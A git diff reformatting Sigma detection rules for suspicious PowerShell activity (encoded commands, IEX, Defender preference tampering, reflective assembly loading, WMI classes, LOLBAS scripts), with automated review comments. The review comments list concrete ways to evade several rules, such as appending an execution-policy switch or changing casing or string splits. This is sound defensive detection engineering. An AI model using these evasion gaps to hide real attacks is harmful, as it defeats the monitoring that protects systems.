b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml @@ -1,12 +1,10 @@ title: Suspicious Encoded PowerShell Command Line id: ca2092a1-c273-4878-9b4b-0d60115bf5ea status: test -description: Detects suspicious powershell process starts with base64 encoded commands - (e.g. Emotet) +description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) references: - https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e -author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, - Anton Kutepov, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community date: 2018/09/03 modified: 2023/04/06 tags: 
@@ -20,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' # covers -en and -enc selection_cli_content: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -40,12 +38,11 @@ detection: - ' UwB' - ' cwB' selection_standalone: - CommandLine|contains: + CommandLine|contains: - '.exe -ENCOD ' - - ' BA^J e-' + - ' BA^J e-' # Reversed filter_optional_remote_signed: - CommandLine|contains: ' -ExecutionPolicy remotesigned ' - condition: process_creation and (selection_img and (all of selection_cli_* or - selection_standalone) and not 1 of filter_optional_*) + CommandLine|contains: ' -ExecutionPolicy remotesigned ' + condition: process_creation and (selection_img and (all of selection_cli_* or selection_standalone) and not 1 of filter_optional_*) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml index d169a1df3..4bb1ae8ee 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml @@ -1,8 +1,7 @@ title: PowerShell Base64 Encoded FromBase64String Cmdlet id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c status: test -description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process - command line +description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line references: - Internal Research author: Florian Roth (Nextron Systems) 
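Review bot: `filter_optional_remote_signed` excludes any command line containing ` -ExecutionPolicy remotesigned `, so an attacker can suppress this `high`-level rule simply by appending that switch to an otherwise matching encoded command; the filter is also broader than whatever false positive it presumably targets. Prefer scoping the exclusion to the parent process or script path that produces the benign hits, or at least record the reason in a comment such as `# FP: <product> launches '-ExecutionPolicy remotesigned -EncodedCommand ...'` so the trade-off is visible. Note also that `' -e'` (commented as covering `-en`/`-enc`) matches `-ExecutionPolicy` itself, so the base64 fragments in `selection_cli_content` are the real discriminator.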
@@ -21,11 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: ::FromBase64String - - CommandLine|contains: - - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA - - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA - - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw + - CommandLine|base64offset|contains: ::FromBase64String + # UTF-16 LE + - CommandLine|contains: + - OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA + - oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA + - 6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml index 19d2a28d0..6b94d1774 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml 
@@ -18,30 +18,31 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: - - IEX ([ - - iex ([ - - iex (New - - IEX (New - - IEX([ - - iex([ - - iex(New - - IEX(New - - IEX((' - - iex((' - - CommandLine|contains: - - SQBFAFgAIAAoAFsA - - kARQBYACAAKABbA - - JAEUAWAAgACgAWw - - aQBlAHgAIAAoAFsA - - kAZQB4ACAAKABbA - - pAGUAeAAgACgAWw - - aQBlAHgAIAAoAE4AZQB3A - - kAZQB4ACAAKABOAGUAdw - - pAGUAeAAgACgATgBlAHcA - - SQBFAFgAIAAoAE4AZQB3A - - kARQBYACAAKABOAGUAdw - - JAEUAWAAgACgATgBlAHcA + - CommandLine|base64offset|contains: + - IEX ([ + - iex ([ + - iex (New + - IEX (New + - IEX([ + - iex([ + - iex(New + - IEX(New + - IEX((' + - iex((' + # UTF16 LE + - CommandLine|contains: + - SQBFAFgAIAAoAFsA + - kARQBYACAAKABbA + - JAEUAWAAgACgAWw + - aQBlAHgAIAAoAFsA + - kAZQB4ACAAKABbA + - pAGUAeAAgACgAWw + - aQBlAHgAIAAoAE4AZQB3A + - kAZQB4ACAAKABOAGUAdw + - pAGUAeAAgACgATgBlAHcA + - SQBFAFgAIAAoAE4AZQB3A + - kARQBYACAAKABOAGUAdw + - JAEUAWAAgACgATgBlAHcA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml index c77e42e5a..494fdaa2b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Invoke Keyword id: 6385697e-9f1b-40bd-8817-f4a91f40508e related: - - id: fd6e2919-3936-40c9-99db-0aa922c356f7 - type: obsoletes + - id: fd6e2919-3936-40c9-99db-0aa922c356f7 + type: obsoletes status: test description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls references: 
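Review bot: Both the `base64offset` list and the hand-encoded UTF-16 list cover only `IEX`/`iex` followed by ` (`, `(`, `([`, `(New` or `(('`, so variants such as `iex ($`, `IEX (&`, `Iex (` or the full `Invoke-Expression (` encode to different base64 and are missed — base64 pins the exact plaintext bytes, so Sigma's case-insensitive `contains` does not help here. If broader coverage is wanted, adding `- 'iex ($'`, `- 'IEX ($'` and `- 'Invoke-Expression ('` to the `base64offset` list suffices, since that modifier derives the three offsets automatically, whereas the hardcoded UTF-16 list must be extended by hand. A comment explaining why the hardcoded list exists (presumably because `base64offset` alone does not produce the UTF-16LE form) would help the next maintainer keep the two lists in sync.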
@@ -23,19 +23,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_enc: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' selection_cli_invoke: - CommandLine|contains: + CommandLine|contains: + # Invoke- + # UTF-16LE - SQBuAHYAbwBrAGUALQ - kAbgB2AG8AawBlAC0A - JAG4AdgBvAGsAZQAtA + # UTF-8 - SW52b2tlL - ludm9rZS - JbnZva2Ut diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml index 19c858a19..4774c5290 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml @@ -1,8 +1,7 @@ title: Powershell Base64 Encoded MpPreference Cmdlet id: c6fb44c6-71f5-49e6-9462-1425d328aee3 status: test -description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries - to modifies or tamper with Windows Defender AV +description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md 
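Review bot: `selection_cli_enc` matches `' -e'` without explanation, unlike the sibling rule `proc_creation_win_powershell_base64_encoded_cmd.yml` in this patch, which carries `# covers -en and -enc`; copy that intent here, e.g. `CommandLine|contains: ' -e' # covers -e, -en, -enc, -EncodedCommand`. Be aware that ` -e` also matches `-ExecutionPolicy` and `-ep`, so the encoded `Invoke-` fragments in `selection_cli_invoke` do the actual discrimination; the `condition` for this rule is outside the hunk.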
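Review bot: The re-flowed description carries a grammar error, `tries to modifies or tamper with`; suggest `description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV.` Since the line is rewritten by this commit anyway, the fix costs nothing.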
@@ -21,24 +20,25 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|base64offset|contains: - - 'Add-MpPreference ' - - 'Set-MpPreference ' - - 'add-mppreference ' - - 'set-mppreference ' - - CommandLine|contains: - - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA - - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA - - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA - - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA - - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA - - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - CommandLine|base64offset|contains: + - 'Add-MpPreference ' + - 'Set-MpPreference ' + - 'add-mppreference ' + - 'set-mppreference ' + - CommandLine|contains: + # UTF16-LE + - QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA + - TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA + - YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA + - cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA + - MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA + - zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml index 4c382cc9e..9d77529a1 100644 
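Review bot: The hardcoded UTF-16LE list covers only the `Add-MpPreference `/`Set-MpPreference ` and all-lowercase spellings, and the `base64offset` list has the same four plaintexts, so any other casing (`set-MpPreference`, `SET-MPPREFERENCE`) or a tab instead of the trailing space yields different base64 and evades the rule — base64 matching cannot inherit Sigma's case-insensitive `contains`. Either document the limitation next to the new `# UTF16-LE` comment, e.g. `# Note: base64 matching is case-sensitive; only the four casings below are covered`, or add the remaining common casings to the `base64offset` list, which derives the three offsets automatically.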
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Reflective Assembly Load id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 related: - - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 - type: similar + - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 + type: similar status: test description: Detects base64 encoded .NET reflective loading of Assembly references: @@ -25,16 +25,20 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # [Reflection.Assembly]::Load( - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA + # [reflection.assembly]::("Load") - AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC - BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp - AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK + # [Reflection.Assembly]::("Load") - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA + # [reflection.assembly]::Load( - WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA 
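Review bot: The selection holds only UTF-16LE base64 fragments of `[Reflection.Assembly]::Load(` and its three casing/call variants; unlike `proc_creation_win_powershell_base64_wmi_classes.yml` later in this patch, which also lists UTF-8 fragments (e.g. `XaW4zMl9TaGFkb3djb3B5`), a UTF-8 encoded payload (typical for `FromBase64String` pipelines, as opposed to `-EncodedCommand`, which expects UTF-16LE) is not covered. Either add the UTF-8 offsets via `- CommandLine|base64offset|contains: '[Reflection.Assembly]::Load('` plus the other three plaintexts, or state the scope in the first comment: `# UTF-16LE only; UTF-8 encoded variants are not covered`. The new per-group plaintext comments are a clear readability win.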
diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml index 2dca9f6f2..7522a6914 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml @@ -1,11 +1,10 @@ title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 related: - - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 - type: similar + - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 + type: similar status: test -description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used - in .NET "reflection.assembly" +description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ 
@@ -26,22 +25,28 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # ::("L"+"oad") - OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ - oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA - 6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA + # ::("Lo"+"ad") - OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ - oAOgAoACIATABvACIAKwAiAGEAZAAiACkA - 6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA + # ::("Loa"+"d") - OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ - oAOgAoACIATABvAGEAIgArACIAZAAiACkA - 6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA + # ::('L'+'oad') - OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ - oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA - 6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA + # ::('Lo'+'ad') - OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ - oAOgAoACcATABvACcAKwAnAGEAZAAnACkA - 6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA + # ::('Loa'+'d') - OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ - oAOgAoACcATABvAGEAJwArACcAZAAnACkA - 6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml index 559b8659e..0f35792a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml @@ -1,11 +1,10 @@ title: PowerShell Base64 Encoded WMI Classes id: 1816994b-42e1-4fb1-afd2-134d88184f71 related: - - id: 47688f1b-9f51-4656-b013-3cc49a166a36 - type: obsoletes + - id: 47688f1b-9f51-4656-b013-3cc49a166a36 + type: obsoletes status: test -description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", - "Win32_ScheduledJob", etc. +description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc. references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
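Review bot: The six groups cover only two-part `"L"+"oad"`-style concatenations with double or single quotes, so three-part splits (`'L'+'o'+'ad'`), lowercase (`'l'+'oad'`), whitespace around `+` (`"L" + "oad"`) or a format string (`'{0}oad' -f 'L'`) encode differently and are missed, since base64 fragments pin the exact plaintext bytes. That is an acceptable scope for a `test` rule, but it should be stated, e.g. `# Note: only the quoted two-part concatenations listed below are covered; other splits encode differently`. Using the `base64offset` modifier on the plaintexts would also let future additions avoid hand-computing the three offsets.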
@@ -23,14 +22,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_shadowcopy: - CommandLine|contains: + # Win32_Shadowcopy + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A @@ -38,7 +38,8 @@ detection: - dpbjMyX1NoYWRvd2NvcH - XaW4zMl9TaGFkb3djb3B5 selection_cli_scheduledJob: - CommandLine|contains: + # Win32_ScheduledJob + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA - cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA - XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg @@ -46,7 +47,8 @@ detection: - dpbjMyX1NjaGVkdWxlZEpvY - XaW4zMl9TY2hlZHVsZWRKb2 selection_cli_process: - CommandLine|contains: + # Win32_Process + CommandLine|contains: - VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw - cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA - XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA @@ -54,7 +56,8 @@ detection: - dpbjMyX1Byb2Nlc3 - XaW4zMl9Qcm9jZXNz selection_cli_useraccount: - CommandLine|contains: + # Win32_UserAccount + CommandLine|contains: - VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A - cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA - XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA @@ -62,7 +65,8 @@ detection: - dpbjMyX1VzZXJBY2NvdW50 - XaW4zMl9Vc2VyQWNjb3Vud selection_cli_loggedonuser: - CommandLine|contains: + # Win32_LoggedOnUser + CommandLine|contains: - VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA - cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA - XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml index 13cb35f97..e4976f366 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml @@ -1,8 +1,7 @@ title: Potential Process Execution Proxy Via CL_Invocation.ps1 id: a0459f02-ac51-4c09-b511-b8c9203fc429 status: test -description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" - script to proxy execution using "System.Diagnostics.Process" +description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" references: - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ - https://twitter.com/bohops/status/948061991012327424 @@ -20,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: 'SyncInvoke ' + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: 'SyncInvoke ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml index cbc842a85..c9a4831e7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml 
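Review bot: The new comment has a typo — `classical process creation even would not catch it` should read `event` — and `"-ScriptBlock"` is a parameter of `Invoke-Command`, not a `powershell.exe` switch, so it cannot appear in a process-creation command line the way `-Command` does. Suggest `# Note: Since this function is usually called from within PowerShell, a classical process-creation event would not catch it. This only catches inline invocations visible on the command line (e.g. via -Command).`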
@@ -1,9 +1,7 @@ title: Assembly Loading Via CL_LoadAssembly.ps1 id: c57872c7-614f-4d7f-a40d-b78c8df2d30d status: experimental -description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that - are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different - assemblies and bypass App locker controls. +description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. references: - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ @@ -21,7 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: - 'LoadAssemblyFromPath ' - 'LoadAssemblyFromNS ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml index 9894e8e82..ccbbfa81a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml 
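Review bot: The description uses `App locker`; the product name is `AppLocker`, which is also how the referenced bohops post spells it. Suggest `description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load arbitrary assemblies and bypass AppLocker controls.`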
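Review bot: Same issue as the comment added to `proc_creation_win_powershell_cl_invocation.yml` in this patch: `process creation even` should be `event`, and `-ScriptBlock` is not a `powershell.exe` switch. Suggest `# Note: Since these functions are usually called from within PowerShell, a classical process-creation event would not catch them. This only catches inline invocations visible on the command line (e.g. via -Command).`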
@@ -1,12 +1,10 @@ title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d status: experimental -description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to - proxy the execution of additional PowerShell script commands +description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ -author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, - frack113 +author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 date: 2022/05/21 modified: 2023/08/17 tags: @@ -20,13 +18,15 @@ detection: EventID: 4688 Channel: Security selection_pwsh: - CommandLine|contains: ' -nologo -windowstyle minimized -file ' + CommandLine|contains: ' -nologo -windowstyle minimized -file ' ParentProcessName|endswith: + # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process - \powershell.exe - \pwsh.exe - NewProcessName|endswith: \powershell.exe + NewProcessName|endswith: \powershell.exe selection_temp: - CommandLine|contains: + # Note: Since the function uses "env:temp" the value will change depending on the context of exec + CommandLine|contains: - \AppData\Local\Temp\ - \Windows\Temp\ condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml index a942a8eb4..22c41783f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml 
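Review bot: `selection_temp` hard-codes `\AppData\Local\Temp\` and `\Windows\Temp\` even though the new comment concedes the path comes from `env:temp` and varies with the execution context, so a user or service account with a redirected TEMP (e.g. `D:\Temp`) bypasses the rule. Either loosen to `CommandLine|contains: \Temp\` or drop `selection_temp` and rely on the distinctive `-nologo -windowstyle minimized -file` argument sequence already required by `selection_pwsh`. Also, `NewProcessName` permits only `\powershell.exe` while `ParentProcessName` accepts `\pwsh.exe`; if that asymmetry is intentional because the script spawns `powershell` by name, a one-line comment would save the next reviewer the question.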
@@ -1,8 +1,7 @@ title: ConvertTo-SecureString Cmdlet Usage Via CommandLine id: 74403157-20f5-415d-89a7-c505779585cf status: test -description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. - Which is fairly uncommon and could indicate potential suspicious activity +description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: ConvertTo-SecureString + CommandLine|contains: ConvertTo-SecureString condition: process_creation and (all of selection_*) falsepositives: - Legitimate use to pass password to different powershell commands diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml index 3f5cc38da..277637f7d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml +++ 